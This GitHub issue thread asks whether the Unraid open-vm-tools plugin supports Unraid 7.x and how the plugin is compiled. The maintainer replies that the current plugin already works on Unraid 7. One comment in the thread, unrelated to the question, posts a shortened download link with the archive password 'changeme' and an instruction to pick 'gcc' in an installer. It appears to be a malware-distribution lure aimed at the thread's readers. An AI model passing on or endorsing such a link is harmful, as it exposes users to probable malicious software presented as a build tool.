### ISSUE TITLE
Unraid 7.x support?

### ISSUE THREAD

**Issue by kubedzero** [StevenDTX/unRAID-open-vm-tools#14]
Thanks for maintaining this for so long! There seems to be a new release of openvmtools, 12.4.5 https://github.com/vmware/open-vm-tools/releases and Unraid also is starting to move to 7.x, currently 7.0.0-beta.2 is the latest release. I am interested in taking this over or at least helping out, and I had a couple questions.

- What's the process of actually doing the compilation for Unraid? Do you have a SlackBuild or any scripting that's useful for compilation? 
- I see as well that at least in old times, each Linux kernel minor version had a separate compilation. Is that still needed? Ideally we could just compile the latest release of OpenVMTools and use that universally across kernels, as it seems to be for 6.x https://github.com/StevenDTX/unRAID-open-vm-tools/blob/master/openVMTools_compiled.plg#L387

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by StevenDTX** [comment]
> Thanks for maintaining this for so long! There seems to be a new release of openvmtools, 12.4.5 https://github.com/vmware/open-vm-tools/releases and Unraid also is starting to move to 7.x, currently 7.0.0-beta.2 is the latest release. I am interested in taking this over or at least helping out, and I had a couple questions.

I would love to have some help, especially if you have more experience with this than I do.


>     * What's the process of actually doing the compilation for Unraid? Do you have a SlackBuild or any scripting that's useful for compilation?

I have a script that I have cobbled together over the years to do the build. However, every time a new VMWare Tools drops or they make a change to unRAID, I end up having to fix something.  I haven't had any time to deal with it, but last I tried, I could not get 12.4.5 to properly compile.  I basically ran my script and it failed and I haven't had time to troubleshoot it.  

That being said, there isn't much different in 12.4.5 from 12.3.5. And honestly, the only reason I care about VMWare Tools is so I can have a proper shutdown of unRAID from within vCenter.

 
>     * I see as well that at least in old times, each Linux kernel minor version had a separate compilation. Is that still needed? Ideally we could just compile the latest release of OpenVMTools and use that universally across kernels, as it seems to be for 6.x https://github.com/StevenDTX/unRAID-open-vm-tools/blob/master/openVMTools_compiled.plg#L387

I have mainly done that to maintain backwards compatibility.  This current process is FAR more simple than it was under older versions of unRAID.  Notice that once we got to version 6.11.0, I stopped compiling a new version of the plugin for each version of unRAID.  

Plugin version 2024.02.13 works just fine on unRAID 7. I'm running on my test server.

**Comment by kubedzero** [comment]
I just finished [building Python from source](https://forums.unraid.net/topic/142908-python-311-unraid-txz-packageplugin/?do=findComment&comment=1291047) for Unraid so while I'm not intimately familiar, I have spent at least a few dozen hours troubleshooting build failures. 

Is that script you cobbled together in this repo? I didn't see it anywhere but would love to reference it as I dive in. 

Good to hear the latest version is working fine on V7, that makes this less urgent than I thought 😁
